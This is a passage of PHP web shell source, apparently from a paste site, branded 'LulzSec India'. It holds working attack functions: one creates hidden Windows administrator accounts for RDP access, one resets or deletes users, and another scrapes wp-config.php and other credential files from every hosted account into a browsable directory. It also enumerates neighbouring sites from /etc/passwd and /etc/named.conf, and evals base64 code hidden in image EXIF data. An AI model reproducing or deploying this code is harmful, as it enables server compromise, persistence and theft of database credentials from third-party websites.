  2748. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
  2749. if($temp)
  2750. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  2751. echo '</div>';
  2752. printFooter();
  2753. }
  2754. function actionrdp() {
  2755. printHeader();
  2756.  
  2757. error_reporting(0);
  2758. $local_host= shell_exec(hostname);
  2759. $server_ip = $_SERVER['SERVER_NAME'];
  2760. $gaya_root = "$local_host:~ ";
  2761. $phpv = @phpversion();
  2762. $o = "<br>";
  2763.  
  2764. $BASED = exif_read_data(" image here ");
  2765. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  2766. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  2767. $status_os = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Windows</span>/<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Linux</span>';
  2768. $status_work = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Can Be Used</span><br>';
  2769. } else {
  2770. $status_os = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Windows</span>/<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Linux</span>';
  2771. $status_work = '<span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">Can Not Be Used</span><br>';
  2772. }
  2773. ?><!DOCTYPE html>
  2774. <html>
  2775. <head>
  2776. <title>LulzSec India</title>
  2777. <link rel='shortcut icon' type='image/x-icon' href='' />
  2778. <meta name="description" content="LulzSec India">
  2779. <meta name="viewport" content="width=device-width, initial-scale=1">
  2780. <style type="text/css">
  2781. body { height: 100%; width: 100%; margin: 0; padding: 0; background-image: url(" "); background-color: #000000; background-size: 100%; background-position: center; background-repeat: no-repeat; color: #C3C3C3; font-family: "Orbitron"; font-size: 14pt; text-align: center; text-decoration: none; } #greets { width: 820px; border-style: outset; } #footer { font-size: 9pt; opacity: .7; } .glow { text-shadow: 0 0 10px #F59700; font-family: "Black Ops One"; } .blueglow { text-shadow: 0 0 10px #0F6FBD; font-family: "Black Ops One" } .whiteglow { text-shadow: 0 0 10px #FFFFFF; font-family: "Black Ops One"; } </style>
  2782.  
  2783. <style type="text/css">
  2784. /* Circle Text Styles */
  2785. #outerCircleText {
  2786. /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
  2787. font-style: italic;
  2788. font-weight: bold;
  2789. font-family: "comic sans ms", verdana, arial;
  2790. color: #FFF;
  2791. /* End Optional */
  2792.  
  2793. /* Start Required - Do Not Edit */
  2794. position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
  2795. #outerCircleText div {position: relative;}
  2796. #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
  2797. /* End Required */
  2798. /* End Circle Text Styles */
  2799. </style>
  2800. </head>
  2801. <body>
  2802. <div id="content-center">
  2803. <pre>
  2804.  
  2805.  
  2806.  
  2807. Mr. Po Panda | <span style="color:White;font-family:Iceland;text-shadow:red 0px 0px 10px" "font-size:="" 40pt;"="">Lulz</span><span style="color:White;font-family:Iceland;text-shadow:green 0px 0px 10px" "font-size:="" 40pt;"="">Sec</span><span style="color:White;font-family:Iceland;text-shadow:blue 0px 0px 10px" "font-size:="" 40pt;"="">India</span>
  2808. OS Server : <?php echo php_uname("s")." | "; echo "{".$status_os."}<br>";?>
  2809. Informasi : <?php echo "Server IP - ".$server_ip." {".$_SERVER['REMOTE_ADDR']."}";?>
  2810. Info Tool : <?php echo $status_work;?>
  2811.  
  2812.  
  2813. </pre>
  2814. </div>
  2815. <?php if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){?>
  2816. <span style="font-size: 25px;"><b>
  2817. <span style="color:White;font-family:Iceland;text-shadow:orange 0px 0px 5px" "font-size:="" 20pt;"="">Powered by</span><span style="color:White;font-family:Iceland;text-shadow:white 0px 0px 5px" "font-size:="" 20pt;"=""> LulzSec </span> <span style="color:White;font-family:Iceland;text-shadow:green 0px 0px 5px" "font-size:="" 20pt;"=""> India</span>
  2818. <div id="content-left">
  2819. <p>Create Remote Desktop Protocol </p>
  2820. <form action="" method="post">Username : <input type="text" name="username" required>
  2821. Password : <input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value="Make">
  2822. </form>
  2823. </div>
  2824.  
  2825.  
  2826. <div id="content-left">
  2827. <p> Option </p>
  2828. <form action="" method="post">command : <input type="text" name="username" placeholder="Input Username"> <select name="aksi">
  2829. <option value="1">Show Username</option>
  2830. <option value="2">Clear Username</option>
  2831. <option value="3">Change Password</option>
  2832. </select>
  2833. <input type="hidden" name="kshell" value="2">
  2834. <input type="submit" name="submit" value="Submit"></form>
  2835. </div>
  2836. <?php }
  2837. ?>
  2838. <?php
  2839. if($_POST['submit']){
  2840. echo "<p>---------------{ INFO }---------------</p>";
  2841. if($_POST['kshell']=="1"){
  2842. $r_user = $_POST['username'];
  2843. $r_pass = $_POST['password'];
  2844. $cmd_cek_user = shell_exec("net user");
  2845. if(preg_match("/$r_user/", $cmd_cek_user)){
  2846. echo $gaya_root.$r_user." already There".$o;
  2847. }else {
  2848. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
  2849. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  2850. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  2851. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  2852.  
  2853. if($cmd_add_user){
  2854. echo $gaya_root."[add user]-> ".$r_user." <font color='greenyellow'>Successfully</font>".$o;
  2855. }else {
  2856. echo $gaya_root."[add user]-> ".$r_user." <font color='red'>Faild</font>".$o;
  2857. }
  2858. if($cmd_add_groups1){
  2859. echo $gaya_root."[add localgroup Administrators]-> ".$r_user." <font color='greenyellow'>Succeed</font>".$o;
  2860. }else
  2861. if($cmd_add_groups2){
  2862. echo $gaya_root."[add localgroup Administrator]-> ".$r_user." <font color='greenyellow'>Succeed</font>".$o;
  2863. }else
  2864. if($cmd_add_groups3){
  2865. echo $gaya_root."[add localgroup Administrateur]-> ".$r_user." <font color='greenyellow'>Succeed</font>".$o;
  2866. }else {
  2867. echo $gaya_root."[add localgroup]-> ".$r_user." <font color='red'>Faild - Contact LulzSec india</font>".$o;
  2868. }
  2869. echo $gaya_root."[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Succeed</font>".$o;
  2870.  
  2871. }
  2872.  
  2873.  
  2874.  
  2875. }else if($_POST['kshell']=="2"){
  2876.  
  2877. if($_POST['aksi']=="1"){
  2878. echo "<pre>".shell_exec("net user");
  2879. }
  2880. else if($_POST['aksi']=="2"){
  2881. $username = $_POST['username'];
  2882. $cmd_cek_user = shell_exec("net user");
  2883. if (!empty($username)){
  2884. if(preg_match("/$username/", $cmd_cek_user)){
  2885. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
  2886. if($cmd_add_user){
  2887. echo $gaya_root."[remove user]-> ".$username." <font color='greenyellow'>Succeed</font>".$o;
  2888. }else {
  2889. echo $gaya_root."[remove user]-> ".$username." <font color='red'>Faild</font>".$o;
  2890. }
  2891. }else {
  2892. echo $gaya_root."[remove user]-> ".$username." <font color='red'>Not Found</font>".$o;
  2893. }
  2894. }else {
  2895. echo $gaya_root."[Message]=> <font color='red'>You Frogot to Enter a username that will delete</font>".$o;
  2896. }
  2897. }
  2898. else if($_POST['aksi']=="3"){
  2899. $username = $_POST['username'];
  2900. $password = "india";
  2901. $cmd_cek_user = shell_exec("net user");
  2902. if (!empty($username)){
  2903. if(preg_match("/$username/", $cmd_cek_user)){
  2904. $cmd_add_user = shell_exec("net user ".$username." india123");
  2905. if($cmd_add_user){
  2906. echo $gaya_root."[change password]-> (".$username."|".$password.") <font color='greenyellow'>Succeed</font>".$o;
  2907. }else {
  2908. echo $gaya_root."[change password]-> (".$username."|".$password.") <font color='red'>Faild</font>".$o;
  2909. }
  2910. }else
  2911. {
  2912. echo $gaya_root."[Message]-> <font color='red'>Username is not found in server</font>".$o;
  2913. }
  2914. }else
  2915. {
  2916. echo $gaya_root."[Message]-> <font color='red'>You Frogot to Enter a username that will delete</font>".$o;
  2917. }
  2918. }
  2919. }
  2920. }
  2921. echo"</pre>
  2922. </body>
  2923. </html>";
  2924.  
  2925. printFooter();
  2926. }
  2927.  
  2928. function actionJumping()
  2929. { printHeader();
  2930. echo '<html><head><title>'.getenv("HTTP_HOST").' - Jumping Server</title></head><body>';
  2931. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<font size="4" color="#000000" face="Calibri"><b>Error: Safe_mode = On</b></font>');
  2932. set_time_limit(0);@$passwd = fopen('/etc/passwd','r');if (!$passwd) { die('<font size="4" color="#e5e5e5" face="Calibri"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>'); }
  2933. $pub = array();$users = array();$conf = array();$i = 0;while(!feof($passwd)){$str = fgets($passwd);if ($i > 100){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); }}}$i++;}
  2934. echo '<font color=red> [-]==================[ Ye loo jumping ]==================[-]<br></font>';
  2935. foreach ($users as $user){echo "<font color=#a3e956> [+] /home/$user/public_html/</font><br/>";} echo "\n <font color=red><br>[-]==================[ khatam kitna kudega ]==================[-] <br></font>\n"; echo '</body></html>';
  2936. printFooter();
  2937. }
  2938. function actionSubdomain() {
  2939. printHeader();
  2940. error_reporting(0);
  2941. $user = get_current_user();
  2942. $open = opendir('/home/' . $user . '/access-logs/');
  2943. while ($dir = readdir($open)) {
  2944. $totalDoamin[] = $dir;
  2945. }
  2946. closedir($open);
  2947. $total = count($totalDoamin);
  2948. $domain = $total - 2;
  2949. if ($domain > 0) {
  2950. echo "<h2><b><font style=\"color: #a3e956 ;\" > Total </font><font style=\"color: #a3e956; \">" . $domain . "</font><font style=\"color: #a3e956;\" > Sub Domain Found! </font><br><BR>";
  2951. } else {
  2952. echo "<h2><b> <font color='Blue' style=\"color: blue; text-shadow: red 0px 0px 4px ; \">0</font><font style=\"color: #black; text-shadow: black 0px 0px 6px ;\"> Sub Domain Found! </font><br><BR>";
  2953. }
  2954. $scan = array_diff(scandir('/home/' . $user . '/access-logs/'), array('.'));
  2955. $domains = implode("
  2956. http://", $scan);
  2957. echo '
  2958. <style>
  2959. body {
  2960. text-align: center;
  2961. }
  2962. </style><textarea style="color: #a3e956; background-color: black" rows=\'30\' cols=\'100\'>';
  2963. print_r($domains);
  2964. echo '</textarea>';
  2965. printFooter();
  2966. }
  2967. function actionConfigGrabber() {
  2968. printHeader();
  2969. error_reporting(0);
  2970. system('mkdir POPANDA');
  2971. chmod('POPANDA', 0777);
  2972. $users = file("/etc/passwd");
  2973. $lolx = array();
  2974. foreach ($users as $user) {
  2975. $users = explode(":", $user);
  2976. $lolx[] = $users[0];
  2977. }
  2978. foreach ($lolx as $lol) {
  2979. $space = "
  2980.  
  2981. " . "*" . "
  2982. " . "*" . "
  2983. " . "*" . "
  2984.  
  2985. ";
  2986. if (file_exists('/home/' . $lol . 'public_html/portal/configuration.php')) {
  2987. $content = file_get_contents('/home/' . $lol . 'public_html/portal/configuration.php');
  2988. $handle = fopen('POPANDA/whm.txt', 'a');
  2989. fwrite($handle, $content . $space);
  2990. fclose($handle);
  2991. } elseif (file_exists('/home/' . $lol . '/public_html/inc/config.php')) {
  2992. $content1 = file_get_contents('/home/' . $lol . '/public_html/inc/config.php');
  2993. $handle = fopen('POPANDA/config.txt', 'a');
  2994. fwrite($handle, $content . $space);
  2995. fclose($handle);
  2996. } elseif (file_exists('/home/' . $lol . '/public_html/sites/default/settings.php')) {
  2997. $content2 = file_get_contents('/home/' . $lol . '/public_html/sites/default/settings.php');
  2998. $handle = fopen('POPANDA/config.txt', 'a');
  2999. fwrite($handle, $content2 . $space);
  3000. fclose($handle);
  3001. } elseif (file_exists('/home/' . $lol . '/public_html/includes/configure.php')) {
  3002. $content3 = file_get_contents('/home/' . $lol . '/public_html/includes/configure.php');
  3003. $handle = fopen('POPANDA/config.txt', 'a');
  3004. fwrite($handle, $content3 . $space);
  3005. fclose($handle);
  3006. } elseif (file_exists('/home/' . $lol . '/public_html/lib/config.php')) {
  3007. $content4 = file_get_contents('/home/' . $lol . '/public_html/lib/config.php');
  3008. $handle = fopen('POPANDA/config.txt', 'a');
  3009. fwrite($handle, $content4 . $space);
  3010. fclose($handle);
  3011. } elseif (file_exists('/home/' . $lol . '/public_html/config/koneksi.php')) {
  3012. $content5 = file_get_contents('/home/' . $lol . '/public_html/config/koneksi.php');
  3013. $handle = fopen('POPANDA/config.txt', 'a');
  3014. fwrite($handle, $content5 . $space);
  3015. fclose($handle);
  3016. } elseif (file_exists('/home/' . $lol . '/public_html/vb/includes/config.php')) {
  3017. $content6 = file_get_contents('/home/' . $lol . '/public_html/vb/includes/config.php');
  3018. $handle = fopen('POPANDA/config.txt', 'a');
  3019. fwrite($handle, $content6 . $space);
  3020. fclose($handle);
  3021. } elseif (file_exists('/home/' . $lol . '/public_html/includes/config.php')) {
  3022. $content7 = file_get_contents('/home/' . $lol . '/public_html/includes/config.php');
  3023. $handle = fopen('POPANDA/config.txt', 'a');
  3024. fwrite($handle, $content7 . $space);
  3025. fclose($handle);
  3026. } elseif (file_exists('/home/' . $lol . '/public_html/forum/includes/config.php')) {
  3027. $content8 = file_get_contents('/home/' . $lol . '/public_html/forum/includes/config.php');
  3028. $handle = fopen('POPANDA/config.txt', 'a');
  3029. fwrite($handle, $content8 . $space);
  3030. fclose($handle);
  3031. } elseif (file_exists('/home/' . $lol . '/public_html/cc/includes/config.php')) {
  3032. $content9 = file_get_contents('/home/' . $lol . '/public_html/cc/includes/config.php');
  3033. $handle = fopen('POPANDA/config.txt', 'a');
  3034. fwrite($handle, $content9 . $space);
  3035. fclose($handle);
  3036. } elseif (file_exists('/home/' . $lol . '/public_html/config.php')) {
  3037. $content10 = file_get_contents('/home/' . $lol . '/public_html/config.php');
  3038. $handle = fopen('POPANDA/config.txt', 'a');
  3039. fwrite($handle, $content10 . $space);
  3040. fclose($handle);
  3041. } elseif (file_exists('/home/' . $lol . '/public_html/forum/includes/config.php')) {
  3042. $content11 = file_get_contents('/home/' . $lol . '/public_html/forum/includes/config.php');
  3043. $handle = fopen('POPANDA/config.txt', 'a');
  3044. fwrite($handle, $content11 . $space);
  3045. fclose($handle);
  3046. } elseif (file_exists('/home/' . $lol . '/public_html/wp-config.php')) {
  3047. $content12 = file_get_contents('/home/' . $lol . '/public_html/wp-config.php');
  3048. $handle = fopen('POPANDA/config.txt', 'a');
  3049. fwrite($handle, $content12 . $space);
  3050. fclose($handle);
  3051. } elseif (file_exists('/home/' . $lol . '/public_html/blog/wp-config.php')) {
  3052. $content13 = file_get_contents('/home/' . $lol . '/public_html/blog/wp-config.php');
  3053. $handle = fopen('POPANDA/config.txt', 'a');
  3054. fwrite($handle, $content13 . $space);
  3055. fclose($handle);
  3056. } elseif (file_exists('/home/' . $lol . '/public_html/wp/wp-config.php')) {
  3057. $content14 = file_get_contents('/home/' . $lol . '/public_html/wp/wp-config.php');
  3058. $handle = fopen('POPANDA/config.txt', 'a');
  3059. fwrite($handle, $content14 . $space);
  3060. fclose($handle);
  3061. } elseif (file_exists('/home/' . $lol . '/public_html/home/wp-config.php')) {
  3062. $content15 = file_get_contents('/home/' . $lol . '/public_html/home/wp-config.php');
  3063. $handle = fopen('POPANDA/config.txt', 'a');
  3064. fwrite($handle, $content15 . $space);
  3065. fclose($handle);
  3066. } elseif (file_exists('/home/' . $lol . '/public_html/wp-config.php')) {
  3067. $content16 = file_get_contents('/home/' . $lol . '/public_html/wp-config.php');
  3068. $handle = fopen('POPANDA/config.txt', 'a');
  3069. fwrite($handle, $content16 . $space);
  3070. fclose($handle);
  3071. } elseif (file_exists('/home/' . $lol . '/public_html/main/wp-config.php')) {
  3072. $content17 = file_get_contents('/home/' . $lol . '/public_html/main/wp-config.php');
  3073. $handle = fopen('POPANDA/config.txt', 'a');
  3074. fwrite($handle, $content17 . $space);
  3075. fclose($handle);
  3076. } elseif (file_exists('/home/' . $lol . '/public_html/site/wp-config.php')) {
  3077. $content18 = file_get_contents('/home/' . $lol . '/public_html/site/wp-config.php');
  3078. $handle = fopen('POPANDA/config.txt', 'a');
  3079. fwrite($handle, $content18 . $space);
  3080. fclose($handle);
  3081. } elseif (file_exists('/home/' . $lol . '/public_html/configuration.php')) {
  3082. $content19 = file_get_contents('/home/' . $lol . '/public_html/configuration.php');
  3083. $handle = fopen('POPANDA/config.txt', 'a');
  3084. fwrite($handle, $content19 . $space);
  3085. fclose($handle);
  3086. } elseif (file_exists('/home/' . $lol . '/public_html/blog/configuration.php')) {
  3087. $content20 = file_get_contents('/home/' . $lol . '/public_html/blog/configuration.php');
  3088. $handle = fopen('POPANDA/config.txt', 'a');
  3089. fwrite($handle, $content20 . $space);
  3090. fclose($handle);
  3091. } elseif (file_exists('/home/' . $lol . '/public_html/joomla/configuration.php')) {
  3092. $content21 = file_get_contents('/home/' . $lol . '/public_html/joomla/configuration.php');
  3093. $handle = fopen('POPANDA/config.txt', 'a');
  3094. fwrite($handle, $content21 . $space);
  3095. fclose($handle);
  3096. } elseif (file_exists('/home/' . $lol . '/public_html/main/configuration.php')) {
  3097. $content22 = file_get_contents('/home/' . $lol . '/public_html/main/configuration.php');
  3098. $handle = fopen('POPANDA/config.txt', 'a');
  3099. fwrite($handle, $content22 . $space);
  3100. fclose($handle);
  3101. } elseif (file_exists('/home/' . $lol . '/public_html/home/configuration.php')) {
  3102. $content23 = file_get_contents('/home/' . $lol . '/public_html/home/configuration.php');
  3103. $handle = fopen('POPANDA/config.txt', 'a');
  3104. fwrite($handle, $content23 . $space);
  3105. fclose($handle);
  3106. } elseif (file_exists('/home/' . $lol . '/public_html/site/configuration.php')) {
  3107. $content24 = file_get_contents('/home/' . $lol . '/public_html/site/configuration.php');
  3108. $handle = fopen('POPANDA/config.txt', 'a');
  3109. fwrite($handle, $content24 . $space);
  3110. fclose($handle);
  3111. } elseif (file_exists('/home/' . $lol . '/public_html/whm/configuration.php')) {
  3112. $content25 = file_get_contents('/home/' . $lol . '/public_html/whm/configuration.php');
  3113. $handle = fopen('POPANDA/config.txt', 'a');
  3114. fwrite($handle, $content25 . $space);
  3115. fclose($handle);
  3116. } elseif (file_exists('/home/' . $lol . '/public_html/whmc/configuration.php')) {
  3117. $content26 = file_get_contents('/home/' . $lol . '/public_html/whmc/configuration.php');
  3118. $handle = fopen('POPANDA/config.txt', 'a');
  3119. fwrite($handle, $content26 . $space);
  3120. fclose($handle);
  3121. } elseif (file_exists('/home/' . $lol . '/public_html/support/configuration.php')) {
  3122. $content27 = file_get_contents('/home/' . $lol . '/public_html/support/configuration.php');
  3123. $handle = fopen('POPANDA/config.txt', 'a');
  3124. fwrite($handle, $content27 . $space);
  3125. fclose($handle);
  3126. } elseif (file_exists('/home/' . $lol . '/public_html/client/configuration.php')) {
  3127. $content28 = file_get_contents('/home/' . $lol . '/public_html/client/configuration.php');
  3128. $handle = fopen('POPANDA/config.txt', 'a');
  3129. fwrite($handle, $content28 . $space);
  3130. fclose($handle);
  3131. } elseif (file_exists('/home/' . $lol . '/public_html/billings/configuration.php')) {
  3132. $content29 = file_get_contents('/home/' . $lol . '/public_html/billings/configuration.php');
  3133. $handle = fopen('POPANDA/config.txt', 'a');
  3134. fwrite($handle, $content29 . $space);
  3135. fclose($handle);
  3136. } elseif (file_exists('/home/' . $lol . '/public_html/billing/configuration.php')) {
  3137. $content30 = file_get_contents('/home/' . $lol . '/public_html/billing/configuration.php');
  3138. $handle = fopen('POPANDA/config.txt', 'a');
  3139. fwrite($handle, $content30 . $space);
  3140. fclose($handle);
  3141. } elseif (file_exists('/home/' . $lol . '/public_html/clients/configuration.php')) {
  3142. $content31 = file_get_contents('/home/' . $lol . '/public_html/clients/configuration.php');
  3143. $handle = fopen('POPANDA/config.txt', 'a');
  3144. fwrite($handle, $content31 . $space);
  3145. fclose($handle);
  3146. } elseif (file_exists('/home/' . $lol . '/public_html/whmcs/configuration.php')) {
  3147. $content32 = file_get_contents('/home/' . $lol . '/public_html/whmcs/configuration.php');
  3148. $handle = fopen('POPANDA/config.txt', 'a');
  3149. fwrite($handle, $content32 . $space);
  3150. fclose($handle);
  3151. } elseif (file_exists('/home/' . $lol . '/public_html/order/configuration.php')) {
  3152. $content33 = file_get_contents('/home/' . $lol . '/public_html/order/configuration.php');
  3153. $handle = fopen('POPANDA/config.txt', 'a');
  3154. fwrite($handle, $content33 . $space);
  3155. fclose($handle);
  3156. } elseif (file_exists('/home/' . $lol . '/public_html/admin/conf.php')) {
  3157. $content34 = file_get_contents('/home/' . $lol . '/public_html/admin/conf.php');
  3158. $handle = fopen('POPANDA/config.txt', 'a');
  3159. fwrite($handle, $content34 . $space);
  3160. fclose($handle);
  3161. } elseif (file_exists('/home/' . $lol . '/public_html/admin/config.php')) {
  3162. $content35 = file_get_contents('/home/' . $lol . '/public_html/admin/config.php');
  3163. $handle = fopen('POPANDA/config.txt', 'a');
  3164. fwrite($handle, $content35 . $space);
  3165. fclose($handle);
  3166. } elseif (file_exists('/home/' . $lol . '/public_html/conf_global.php')) {
  3167. $content36 = file_get_contents('/home/' . $lol . '/public_html/conf_global.php');
  3168. $handle = fopen('POPANDA/config.txt', 'a');
  3169. fwrite($handle, $content36 . $space);
  3170. fclose($handle);
  3171. } elseif (file_exists('/home/' . $lol . '/public_html/include/db.php')) {
  3172. $content37 = file_get_contents('/home/' . $lol . '/public_html/include/db.php');
  3173. $handle = fopen('POPANDA/config.txt', 'a');
  3174. fwrite($handle, $content37 . $space);
  3175. fclose($handle);
  3176. } elseif (file_exists('/home/' . $lol . '/public_html/connect.php')) {
  3177. $content38 = file_get_contents('/home/' . $lol . '/public_html/connect.php');
  3178. $handle = fopen('POPANDA/config.txt', 'a');
  3179. fwrite($handle, $content38 . $space);
  3180. fclose($handle);
  3181. } elseif (file_exists('/home/' . $lol . '/public_html/mk_conf.php')) {
  3182. $content39 = file_get_contents('/home/' . $lol . '/public_html/mk_conf.php');
  3183. $handle = fopen('POPANDA/config.txt', 'a');
  3184. fwrite($handle, $content39 . $space);
  3185. fclose($handle);
  3186. } elseif (file_exists('/home/' . $lol . '/public_html/include/config.php')) {
  3187. $content40 = file_get_contents('/home/' . $lol . '/public_html/include/config.php');
  3188. $handle = fopen('POPANDA/config.txt', 'a');
  3189. fwrite($handle, $content40 . $space);
  3190. fclose($handle);
  3191. } elseif (file_exists('/home/' . $lol . '/public_html/settings.php')) {
  3192. $content41 = file_get_contents('/home/' . $lol . '/public_html/settings.php');
  3193. $handle = fopen('POPANDA/config.txt', 'a');
  3194. fwrite($handle, $content41 . $space);
  3195. fclose($handle);
  3196. } elseif (file_exists('/home/' . $lol . '/public_html/includes/functions.php')) {
  3197. $content42 = file_get_contents('/home/' . $lol . '/public_html/includes/functions.php');
  3198. $handle = fopen('POPANDA/config.txt', 'a');
  3199. fwrite($handle, $content42 . $space);
  3200. fclose($handle);
  3201. } elseif (file_exists('/home/' . $lol . '/public_html/include/db.php')) {
  3202. $content43 = file_get_contents('/home/' . $lol . '/public_html/include/db.php');
  3203. $handle = fopen('POPANDA/config.txt', 'a');
  3204. fwrite($handle, $content43 . $space);
  3205. fclose($handle);
  3206. }
  3207. }
  3208. $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/POPANDA/';
  3209. if (file_exists("POPANDA/config.txt")) {
  3210. echo '<h3 class="POPANDA"><center><a href="' . $url . '" target="_blank"> Config Found ^_^</a></h3>';
  3211. $myfile = fopen("POPANDA/.htaccess", "w") or die("Unable to open file!");
  3212. $txt = "Options +Indexes";
  3213. fwrite($myfile, $txt);
  3214. fclose($myfile);
  3215. } else {
  3216. echo '<h3 class="POPANDA"><center><a href="' . $url . '" target="_blank"> 0 Config Grab BC </a></h3>';
  3217. }
  3218.  
  3219. printFooter();
  3220. }
  3221.  
  3222. function actionShared() {
  3223. printHeader();
  3224. $file = @implode(@file("/etc/named.conf"));
  3225. if (!$file) {
  3226. die("# can't ReaD -> [ /etc/named.conf ]");
  3227. }
  3228. preg_match_all("#named/(.*?).db#", $file, $r);
  3229. $domains = array_unique($r[1]);
  3230. {
  3231. foreach ($domains as $domain) {
  3232. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  3233. $array= "http://$domain " . $user['name'] . "<br>";
  3234. $lol= '' . get_current_user();
  3235. if (strpos($array, "$lol") !== false) {
  3236. $shared = str_replace(array(" $lol"), "", $array);
  3237. echo "<center>$shared";
  3238. }
  3239. }
  3240. }
  3241. printFooter();
  3242. }
  3243.  
  3244. if( empty($_POST['a']) )
  3245. if(isset($default_action) && function_exists('action' . $default_action))
  3246. $_POST['a'] = $default_action;
  3247. else
  3248. $_POST['a'] = 'SecInfo';
  3249. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  3250. call_user_func('action' . $_POST['a'])
  3251. ?>
Add Comment
Please, Sign In to add comment